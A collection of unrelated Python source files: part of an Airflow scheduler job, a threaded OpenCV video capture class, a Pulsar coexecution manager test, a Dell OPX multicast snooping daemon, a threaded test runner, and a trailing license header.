for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date) \
.update({models.TaskInstance.state: new_state}, synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _find_executable_task_instances(
self,
simple_dag_bag: SimpleDagBag,
session: Session = None
) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
task_instances_to_examine: List[TI] = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR, and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB.value))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id.is_(None), not_(DM.is_paused)))
.filter(TI.state == State.SCHEDULED)
.all()
)
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools: Dict[str, models.Pool] = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
serialized_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit: Optional[int] = None
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(
self, task_instances: List[TI], session: Session = None
) -> List[SimpleTaskInstance]:
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
tis_to_set_to_queued: List[TI] = (
session
.query(TI)
.filter(TI.filter_for_tis(task_instances))
.filter(TI.state == State.SCHEDULED)
.with_for_update()
.all()
)
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False
)
session.commit()
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(
self,
simple_dag_bag: SimpleDagBag,
simple_task_instances: List[SimpleTaskInstance]
) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
# actually enqueue them
for simple_task_instance in simple_task_instances:
serialized_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=serialized_dag.full_filepath,
pickle_id=serialized_dag.pickle_id,
)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue,
)
@provide_session
def _execute_task_instances(
self,
simple_dag_bag: SimpleDagBag,
session: Session = None
) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, session=session)
def query(result: int, items: List[TI]) -> int:
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items, session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = ti_query.with_for_update().all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag: SimpleDagBag, session: Session = None) -> None:
"""
Respond to executor events.
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer(simple_dag_bag.dag_ids)
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id, ti_key.task_id, ti_key.execution_date, state, ti_key.try_number
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = "Executor reports task instance %s finished (%s) although the " \
"task says its %s. (Info: %s) Was the task killed externally?"
self.log.error(msg, ti, state, ti.state, info)
serialized_dag = simple_dag_bag.get_dag(ti.dag_id)
self.processor_agent.send_callback_to_execute(
full_filepath=serialized_dag.full_filepath,
task_instance=ti,
msg=msg % (ti, state, ti.state, info),
)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_runs)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_runs,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=self.dag_ids,
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.adopt_or_reset_orphaned_tasks()
self.register_exit_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
failure_callback_requests: List[FailureCallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool
) -> DagFileProcessorProcess:
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_ids=dag_ids,
failure_callback_requests=failure_callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
serialized_dags = self.processor_agent.harvest_serialized_dags()
self.log.debug("Harvested %d SimpleDAGs", len(serialized_dags))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(serialized_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
self._emit_pool_metrics()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
if not is_unit_test:
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as all files have been processed %d times", self.num_runs
)
break
def _validate_and_run_task_instances(self, simple_dag_bag: SimpleDagBag) -> bool:
if simple_dag_bag.serialized_dags:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e: # pylint: disable=broad-except
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag: SimpleDagBag) -> None:
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(
simple_dag_bag=simple_dag_bag,
old_states=[State.UP_FOR_RETRY],
new_state=State.FAILED
)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(
simple_dag_bag=simple_dag_bag,
old_states=[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE,
State.SENSING],
new_state=State.NONE
)
self._execute_task_instances(simple_dag_bag)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
num_failed = session.query(SchedulerJob).filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout))
).update({"state": State.FAILED})
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
tis_to_reset_or_adopt = (
session.query(TI).filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(DagRun.run_type != DagRunType.BACKFILL_JOB.value,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
# Lock these rows, so that another scheduler can't try and adopt these too
.with_for_update(of=TI, **skip_locked(session=session))
.all()
)
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info("Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset), task_instance_str)
return len(to_reset)
|
videoCapture.py | from threading import Thread
import cv2
class VideoCapture():
"""Video capturing with opencv and threads"""
def __init__(self, src=0, name="WebcamVideoStream", resolution = (800,600)):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(3,resolution[0])
self.stream.set(4,resolution[1])
(self.grabbed, self.frame) = self.stream.read()
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return (1, self.frame)
def release(self):
# indicate that the thread should be stopped
self.stopped = True
def isOpened(self):
return not self.stopped
|
manager_coexecution_test.py | import subprocess
import threading
from .test_utils import (
BaseManagerTestCase,
)
from pulsar.managers.unqueued import CoexecutionManager
class Coexecutor(object):
"""Mimic shell script in other container of coexecutor pod-like environment."""
def __init__(self, manager):
self.manager = manager
self.has_command_line = False
self.command_line = None
def monitor(self):
while not self.has_command_line:
try:
command_line = self.manager.read_command_line("123")
except (IOError, ValueError):
continue
if not command_line:
# might be partially written... need to be make this atomic I think.
continue
self.command_line = command_line
self.has_command_line = True
subprocess.call(command_line, shell=True)
# we are ignoring this exit code and just trusting the one in the job script...
# I'm not sure what to do about that.
class CoexecutionManagerTest(BaseManagerTestCase):
def setUp(self):
super(CoexecutionManagerTest, self).setUp()
self._set_manager()
def tearDown(self):
super(CoexecutionManagerTest, self).setUp()
def _set_manager(self, **kwds):
self.manager = CoexecutionManager('_default_', self.app, **kwds)
def test_simple_execution(self):
coexecutor = Coexecutor(self.manager)
t = threading.Thread(target=coexecutor.monitor)
t.start()
try:
self._test_simple_execution(self.manager, timeout=5)
finally:
coexecutor.has_command_line = True
t.join(2)
|
base_mcast_snoop.py | #!/usr/bin/python
# Copyright (c) 2019 Dell Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT
# LIMITATION ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS
# FOR A PARTICULAR PURPOSE, MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
import signal
import cps
import cps_utils
import cps_object
import systemd.daemon
import dn_base_mcast_snoop_utils as mcast_utils
import dn_base_mcast_snoop as mcast_snoop
import time
import event_log as ev
import logging
import os as mcast_os
import threading
key_prefix = 'igmp-mld-snooping/rt/routing-state/control-plane-protocols/'
ip_types = {'igmp-snooping': 'ipv4', 'mld-snooping': 'ipv6'}
snoop_state_keys = {key_prefix + x + '/' + 'vlans/vlan': (
cps.key_from_name('observed', key_prefix + x + '/' + 'vlans/vlan'), ip_types[x]) \
for x in ip_types}
_igmp_keys = {
"igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/global":
cps.key_from_name("target", "igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/global"),
"igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/global":
cps.key_from_name("target", "igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/global"),
"igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/vlans/vlan":
cps.key_from_name("target", "igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/vlans/vlan"),
"igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/vlans/vlan":
cps.key_from_name("target", "igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/vlans/vlan"),
"igmp-mld-snooping/rt/routing-state/control-plane-protocols/igmp-snooping/vlans/vlan":
cps.key_from_name("observed", "igmp-mld-snooping/rt/routing-state/control-plane-protocols/igmp-snooping/vlans/vlan"),
"igmp-mld-snooping/rt/routing-state/control-plane-protocols/igmp-snooping/vlans":
cps.key_from_name("observed", "igmp-mld-snooping/rt/routing-state/control-plane-protocols/igmp-snooping/vlans")
}
_igmp_keys.update({x: snoop_state_keys[x][0] for x in snoop_state_keys})
snoop_cfg_file = '/etc/opx/base_no_mcast_snooping'
kernel_snooping_needed = True
def _is_ip_link_snoop_cmd_supported():
#For now, all snoop updates are based on file
return False
def get_cb(methods, params):
iplink_get_state = _is_ip_link_snoop_cmd_supported()
obj = cps_object.CPSObject(obj = params['filter'])
resp = params['list']
ret_val = False
for key_str, (key, ip_type) in snoop_state_keys.items():
if obj.get_key() == key:
try:
vlan_id = obj.get_attr_data('vlan-id')
except ValueError:
vlan_id = None
try:
ret_val = mcast_utils.get_igmp_snooping(resp, key_str, ip_type,
iplink_get_state, vlan_id)
except Exception as ex:
return False
break
return ret_val
def trans_cb(methods, params):
try:
if kernel_snooping_needed is True:
ret = _is_ip_link_snoop_cmd_supported()
if ret:
return mcast_utils.handle_configs(params)
else:
return mcast_utils.handle_configs_fs(params)
else:
#Some snooping application is present and it will update
#snoop status,mrouter port and routes.No update to kernel.
return mcast_snoop.handle_snoop_updates(params)
except Exception as ex:
logging.exception(ex)
return False
def sigterm_hdlr(signum, frame):
global shutdown
shutdown = True
def _mcast_set_attr_type():
cps_utils.add_attr_type("igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/vlans/vlan/static-l2-multicast-group/source-addr", "string")
cps_utils.add_attr_type("igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/vlans/vlan/static-l2-multicast-group/source-addr", "string")
if __name__ == '__main__':
shutdown = False
# Install signal handlers.
signal.signal(signal.SIGTERM, sigterm_hdlr)
# Notify systemd: Daemon is ready
systemd.daemon.notify("READY=1")
#if file exists means kernel snooping is not needed and some snooping
#application might be running
if mcast_os.path.isfile(snoop_cfg_file) is True:
ev.logging("BASE_MCAST_SNOOP",ev.DEBUG,"MCAST_SVC","","",0,"Kernel IGMP/MLD snooping not needed")
kernel_snooping_needed = False
# Wait for interface service being ready
interface_key = cps.key_from_name('target', 'dell-base-if-cmn/if/interfaces/interface')
ev.logging("BASE_MCAST_SNOOP",ev.DEBUG,"MCAST_SVC","","",0,"Wait for interface object to be ready")
while cps.enabled(interface_key) == False:
time.sleep(1)
ev.logging("BASE_MCAST_SNOOP",ev.DEBUG,"MCAST_SVC","","",0,"Interface object ready")
# Few IP address attributes are in binaries, these ip address are treated as string type.
_mcast_set_attr_type()
handle = cps.obj_init()
d = {}
d['transaction'] = trans_cb
#get is supported only for kernel snooping
if kernel_snooping_needed is True:
d['get'] = get_cb
for i in _igmp_keys.keys():
if i.find('igmp-mld-snooping') == -1:
continue
cps.obj_register(handle, _igmp_keys[i], d)
# Start thread for multicast groups polling
mcast_utils.polling_thread.start()
else:
#Start VLAN monitor thread to disable snooping in kernel.
monitor = threading.Thread(target=mcast_snoop.monitor_VLAN_interface_event, name="Snoop_VLAN_Monitor")
monitor.setDaemon(True)
monitor.start()
#if kernel snooping is not used, then only few sets are supported
# and no gets.
#TODO: till application code gets commited, relax that part, otherwise it might fail
d['get'] = mcast_snoop.snoop_get_cb
for i in _igmp_keys.keys():
if i.find('igmp-mld-snooping') == -1:
continue
cps.obj_register(handle, _igmp_keys[i], d)
# wait until a signal is received
while False == shutdown:
signal.pause()
systemd.daemon.notify("STOPPING=1")
# cleanup code here
# No need to specifically call sys.exit(0).
# That's the default behavior in Python.
|
threads.py | import time
import threading
import dataclasses
from tests.case import Case
import rich
import rich.progress
class TestThread(threading.Thread):
def __init__(self, *args, **kwargs):
self.exc = None
threading.Thread.__init__(self, *args, **kwargs)
def run(self):
try:
if self._target:
self._target(*self._args, **self._kwargs)
except Exception as exc:
self.exc = exc
@dataclasses.dataclass
class TestThreadHolder:
thread: threading.Thread
ppn: int
class MFCTestThreadManager:
def __init__(self, nThreads: int) -> None:
self.threads = []
self.nThreads = nThreads
self.nAvailable = self.nThreads
def join_first_dead_thread(self, progress, complete_tracker) -> None:
for threadID, threadHolder in enumerate(self.threads):
threadHolder: TestThreadHolder
if not threadHolder.thread.is_alive():
if threadHolder.thread.exc != None:
raise threadHolder.thread.exc
self.nAvailable += threadHolder.ppn
progress.advance(complete_tracker)
del self.threads[threadID]
break
def run(self, cases: list, handle_case) -> None:
with rich.progress.Progress() as progress:
queue_tracker = progress.add_task("Queued ", total=len(cases))
complete_tracker = progress.add_task("Completed", total=len(cases))
# Queue Tests
for i, test in enumerate(cases):
test: Case
ppn = test["ppn"]
# Wait until there are threads available
while self.nAvailable < ppn:
# This is important if "-j 1" is used (the default) since there
# are test cases that require ppn=2
if ppn > self.nThreads and self.nAvailable > 0:
break
# Keep track of threads that are done
self.join_first_dead_thread(progress, complete_tracker)
# Do not overwhelm this core with this loop
time.sleep(0.05)
# Launch Thread
progress.advance(queue_tracker)
thread = TestThread(target=handle_case, args=(test,))
thread.start()
self.threads.append(TestThreadHolder(thread, ppn))
self.nAvailable -= ppn
# Wait for the lasts tests to complete
while len(self.threads) != 0:
# Keep track of threads that are done
self.join_first_dead_thread(progress, complete_tracker)
# Do not overwhelm this core with this loop
time.sleep(0.05)
|
eval_multiprocess.py | # Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
